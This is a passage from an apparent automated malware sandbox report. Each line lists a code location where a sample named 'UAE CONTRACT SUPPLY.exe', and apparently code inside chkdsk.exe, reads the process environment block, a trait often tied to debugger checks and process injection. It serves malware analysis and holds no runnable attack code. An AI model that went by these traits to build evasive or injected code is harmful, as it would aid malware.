Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F513A mov eax, dword ptr fs:[00000030h]		3_2_1E4F513A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]		3_2_1E4CB1E1
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]		3_2_1E4CB1E1
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]		3_2_1E4CB1E1
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5541E8 mov eax, dword ptr fs:[00000030h]		3_2_1E5541E8
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FA185 mov eax, dword ptr fs:[00000030h]		3_2_1E4FA185
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EC182 mov eax, dword ptr fs:[00000030h]		3_2_1E4EC182
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F2990 mov eax, dword ptr fs:[00000030h]		3_2_1E4F2990
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]		3_2_1E5451BE
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]		3_2_1E5451BE
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]		3_2_1E5451BE
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]		3_2_1E5451BE
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F61A0 mov eax, dword ptr fs:[00000030h]		3_2_1E4F61A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F61A0 mov eax, dword ptr fs:[00000030h]		3_2_1E4F61A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5469A6 mov eax, dword ptr fs:[00000030h]		3_2_1E5469A6
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_00562CD6 mov eax, dword ptr fs:[00000030h]		3_2_00562CD6
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005658DB mov eax, dword ptr fs:[00000030h]		3_2_005658DB
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005658C3 mov eax, dword ptr fs:[00000030h]		3_2_005658C3
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_00564B16 mov eax, dword ptr fs:[00000030h]		3_2_00564B16
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_00564FBF mov eax, dword ptr fs:[00000030h]		3_2_00564FBF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DC577 mov eax, dword ptr fs:[00000030h]		16_2_056DC577
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DC577 mov eax, dword ptr fs:[00000030h]		16_2_056DC577
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F3D43 mov eax, dword ptr fs:[00000030h]		16_2_056F3D43
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05733540 mov eax, dword ptr fs:[00000030h]		16_2_05733540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05763D40 mov eax, dword ptr fs:[00000030h]		16_2_05763D40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D7D50 mov eax, dword ptr fs:[00000030h]		16_2_056D7D50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0573A537 mov eax, dword ptr fs:[00000030h]		16_2_0573A537
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05788D34 mov eax, dword ptr fs:[00000030h]		16_2_05788D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577E539 mov eax, dword ptr fs:[00000030h]		16_2_0577E539
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]		16_2_056E4D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]		16_2_056E4D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]		16_2_056E4D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]		16_2_056C3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BAD30 mov eax, dword ptr fs:[00000030h]		16_2_056BAD30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05768DF1 mov eax, dword ptr fs:[00000030h]		16_2_05768DF1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CD5E0 mov eax, dword ptr fs:[00000030h]		16_2_056CD5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CD5E0 mov eax, dword ptr fs:[00000030h]		16_2_056CD5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]		16_2_0577FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]		16_2_0577FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]		16_2_0577FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]		16_2_0577FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]		16_2_05736DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]		16_2_05736DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]		16_2_05736DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736DC9 mov ecx, dword ptr fs:[00000030h]		16_2_05736DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]		16_2_05736DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]		16_2_05736DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E35A1 mov eax, dword ptr fs:[00000030h]		16_2_056E35A1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057805AC mov eax, dword ptr fs:[00000030h]		16_2_057805AC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057805AC mov eax, dword ptr fs:[00000030h]		16_2_057805AC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]		16_2_056E1DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]		16_2_056E1DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]		16_2_056E1DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]		16_2_056B2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]		16_2_056B2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]		16_2_056B2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]		16_2_056B2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]		16_2_056B2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]		16_2_056E2581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]		16_2_056E2581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]		16_2_056E2581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]		16_2_056E2581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EFD9B mov eax, dword ptr fs:[00000030h]		16_2_056EFD9B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EFD9B mov eax, dword ptr fs:[00000030h]		16_2_056EFD9B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D746D mov eax, dword ptr fs:[00000030h]		16_2_056D746D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574C450 mov eax, dword ptr fs:[00000030h]		16_2_0574C450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574C450 mov eax, dword ptr fs:[00000030h]		16_2_0574C450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EA44B mov eax, dword ptr fs:[00000030h]		16_2_056EA44B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EBC2C mov eax, dword ptr fs:[00000030h]		16_2_056EBC2C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]		16_2_05771C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]		16_2_0578740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]		16_2_0578740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]		16_2_0578740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]		16_2_05736C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]		16_2_05736C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]		16_2_05736C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]		16_2_05736C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]		16_2_05736CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]		16_2_05736CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]		16_2_05736CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057714FB mov eax, dword ptr fs:[00000030h]		16_2_057714FB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05788CD6 mov eax, dword ptr fs:[00000030h]		16_2_05788CD6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C849B mov eax, dword ptr fs:[00000030h]		16_2_056C849B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CFF60 mov eax, dword ptr fs:[00000030h]		16_2_056CFF60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05788F6A mov eax, dword ptr fs:[00000030h]		16_2_05788F6A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CEF40 mov eax, dword ptr fs:[00000030h]		16_2_056CEF40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B4F2E mov eax, dword ptr fs:[00000030h]		16_2_056B4F2E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B4F2E mov eax, dword ptr fs:[00000030h]		16_2_056B4F2E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EE730 mov eax, dword ptr fs:[00000030h]		16_2_056EE730
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EA70E mov eax, dword ptr fs:[00000030h]		16_2_056EA70E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EA70E mov eax, dword ptr fs:[00000030h]		16_2_056EA70E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574FF10 mov eax, dword ptr fs:[00000030h]		16_2_0574FF10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574FF10 mov eax, dword ptr fs:[00000030h]		16_2_0574FF10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0578070D mov eax, dword ptr fs:[00000030h]		16_2_0578070D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0578070D mov eax, dword ptr fs:[00000030h]		16_2_0578070D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DF716 mov eax, dword ptr fs:[00000030h]		16_2_056DF716
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F37F5 mov eax, dword ptr fs:[00000030h]		16_2_056F37F5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]		16_2_05737794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]		16_2_05737794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]		16_2_05737794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C8794 mov eax, dword ptr fs:[00000030h]		16_2_056C8794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C766D mov eax, dword ptr fs:[00000030h]		16_2_056C766D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]		16_2_056DAE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]		16_2_056DAE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]		16_2_056DAE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]		16_2_056DAE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]		16_2_056DAE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]		16_2_056C7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]		16_2_056C7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]		16_2_056C7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]		16_2_056C7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]		16_2_056C7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]		16_2_056C7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577AE44 mov eax, dword ptr fs:[00000030h]		16_2_0577AE44
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0577AE44 mov eax, dword ptr fs:[00000030h]		16_2_0577AE44
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0576FE3F mov eax, dword ptr fs:[00000030h]		16_2_0576FE3F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BE620 mov eax, dword ptr fs:[00000030h]		16_2_056BE620
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]		16_2_056BC600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]		16_2_056BC600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]		16_2_056BC600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E8E00 mov eax, dword ptr fs:[00000030h]		16_2_056E8E00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EA61C mov eax, dword ptr fs:[00000030h]		16_2_056EA61C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EA61C mov eax, dword ptr fs:[00000030h]		16_2_056EA61C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05771608 mov eax, dword ptr fs:[00000030h]		16_2_05771608
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E16E0 mov ecx, dword ptr fs:[00000030h]		16_2_056E16E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056C76E2 mov eax, dword ptr fs:[00000030h]		16_2_056C76E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E36CC mov eax, dword ptr fs:[00000030h]		16_2_056E36CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F8EC7 mov eax, dword ptr fs:[00000030h]		16_2_056F8EC7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05788ED6 mov eax, dword ptr fs:[00000030h]		16_2_05788ED6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0576FEC0 mov eax, dword ptr fs:[00000030h]		16_2_0576FEC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057346A7 mov eax, dword ptr fs:[00000030h]		16_2_057346A7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]		16_2_05780EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]		16_2_05780EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]		16_2_05780EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574FE87 mov eax, dword ptr fs:[00000030h]		16_2_0574FE87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BC962 mov eax, dword ptr fs:[00000030h]		16_2_056BC962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BB171 mov eax, dword ptr fs:[00000030h]		16_2_056BB171
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BB171 mov eax, dword ptr fs:[00000030h]		16_2_056BB171
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DB944 mov eax, dword ptr fs:[00000030h]		16_2_056DB944
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DB944 mov eax, dword ptr fs:[00000030h]		16_2_056DB944
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]		16_2_056D4120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]		16_2_056D4120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]		16_2_056D4120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]		16_2_056D4120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D4120 mov ecx, dword ptr fs:[00000030h]		16_2_056D4120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E513A mov eax, dword ptr fs:[00000030h]		16_2_056E513A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E513A mov eax, dword ptr fs:[00000030h]		16_2_056E513A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]		16_2_056B9100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]		16_2_056B9100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]		16_2_056B9100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]		16_2_056BB1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]		16_2_056BB1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]		16_2_056BB1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057441E8 mov eax, dword ptr fs:[00000030h]		16_2_057441E8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]		16_2_057351BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]		16_2_057351BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]		16_2_057351BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]		16_2_057351BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E61A0 mov eax, dword ptr fs:[00000030h]		16_2_056E61A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E61A0 mov eax, dword ptr fs:[00000030h]		16_2_056E61A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]		16_2_057749A4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]		16_2_057749A4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]		16_2_057749A4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]		16_2_057749A4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_057369A6 mov eax, dword ptr fs:[00000030h]		16_2_057369A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EA185 mov eax, dword ptr fs:[00000030h]		16_2_056EA185
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DC182 mov eax, dword ptr fs:[00000030h]		16_2_056DC182
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E2990 mov eax, dword ptr fs:[00000030h]		16_2_056E2990
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05772073 mov eax, dword ptr fs:[00000030h]		16_2_05772073
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05781074 mov eax, dword ptr fs:[00000030h]		16_2_05781074
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D0050 mov eax, dword ptr fs:[00000030h]		16_2_056D0050
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056D0050 mov eax, dword ptr fs:[00000030h]		16_2_056D0050
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]		16_2_056E002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]		16_2_056E002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]		16_2_056E002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]		16_2_056E002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E002D mov eax, dword ptr fs:[00000030h]		16_2_056E002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]		16_2_056CB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]		16_2_056CB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]		16_2_056CB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056CB02A mov eax, dword ptr fs:[00000030h]		16_2_056CB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]		16_2_056DA830
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]		16_2_056DA830
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]		16_2_056DA830
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056DA830 mov eax, dword ptr fs:[00000030h]		16_2_056DA830
